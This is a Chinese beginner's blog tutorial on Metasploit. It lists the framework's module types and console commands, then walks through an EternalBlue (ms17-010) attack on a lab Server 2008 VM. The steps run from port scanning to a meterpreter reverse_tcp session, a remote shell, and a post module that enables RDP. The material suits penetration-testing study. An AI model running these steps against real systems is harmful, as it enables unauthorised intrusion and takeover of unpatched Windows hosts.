Metasploit基本使用

  • Post author:
  • Post category:其他




Metasploit框架介绍

Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件实施攻击。它本身附带数千个已知软件漏洞的专业级漏洞攻击工具。



MSF模块介绍

Auxiliary 辅助模块 对渗透测试信息收集提供大量的辅助模块支持

Exploits 攻击模块 利用发现的漏洞对目标进行攻击

Payload 攻击载荷模块 攻击成功后促使靶机运行的一段植入代码

Post 后渗透攻击模块 收集更多信息或进一步访问目标系统

Encoders 编码模块 将攻击载荷进行编码,来进行绕过

Nops 空指令模块 与编码模块联合使用

Evasion 免杀模块



MSF的基本使用

首先输入

service postgresql start

来开始数据库

然后输入

msfconsole

开启msf

在这里插入图片描述


db_status

查看数据库状态

在这里插入图片描述



MSF基础指令


help/?

帮助菜单


exit/quit

退出msf控制台


Back

返回上一级


info

显示一个或者多个模块的信息


show

显示所给类型的模块


backfround

将当前操作在后台运行


use

使用所选择的模块


set

设置选项


unset

取消设置的选项


history

展示使用命令的历史记录


search

模糊查找



MSF攻击演示

这边演示的是永恒之蓝

我们打开一台sever 2008的虚拟机,查看ip,然后与kali的那台虚拟机互ping,看能否ping通

在这里插入图片描述

在这里插入图片描述

然后我们要看他是否开启了445端口,我们在kali虚拟机输入

db_nmap 192.168.xxx -p 445


在这里插入图片描述

通过输入

search ms17-010

来查看需要哪些模块

在这里插入图片描述

输入

use 编号

选定一个模块,输入

options

来查看需要设置什么

在这里插入图片描述

Required为yes的地方yes为空的地方需要设置


RHOSTS

为我们要攻击的地址


RPOST

为攻击的端口


THREADS

为攻击的线程数,越高越快

输入

set rhosts 192.168.xxx


然后输入

run

进行攻击

在这里插入图片描述

输入

search ms17-010

然后选定一个攻击模块,选定之后,会自动生成一个payload

在这里插入图片描述


windows

你对方攻击的是什么系统


/x64/meterpreter/

后渗透攻击工具


reverse

反向链接


_tcp

传输控制协议

如果你不想用这个payload,你可以输入

show payloads

来选择一个你想要的

输入

options

来查看需要设置的选项,然后

set 选项

设置完成之后直接run

如果出现了一个WIN,那就代表攻击成功了,并且返回了一个meterpreter会话

在这里插入图片描述

然后可以输入?来查看帮助文档

输入

getuid

来查看当前的权限

在这里插入图片描述

输入

shell

可以使用受害者的cmd

我们输入

background

将这个先放在后台

在这里插入图片描述

如果想连接目标的3389,而目标没有开启的话,我们可以输入

search enable_rdp

来查找 ,然后选中查找到的模块,然后

options

查看需要设置的选项,我们可以看到只有一个sessions需要我们设置,而这个session就是我们刚才放到后台的那个会话

在这里插入图片描述

输入

set session 2

就设置好了,然后run,我们再去查看3389端口的时候,就可以看他已经是开启状态了

然后我们新开一个终端,输入

resktop 192.168.xxx

,就可以远程连接了

在这里插入图片描述



版权声明:本文为qq_68233961原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。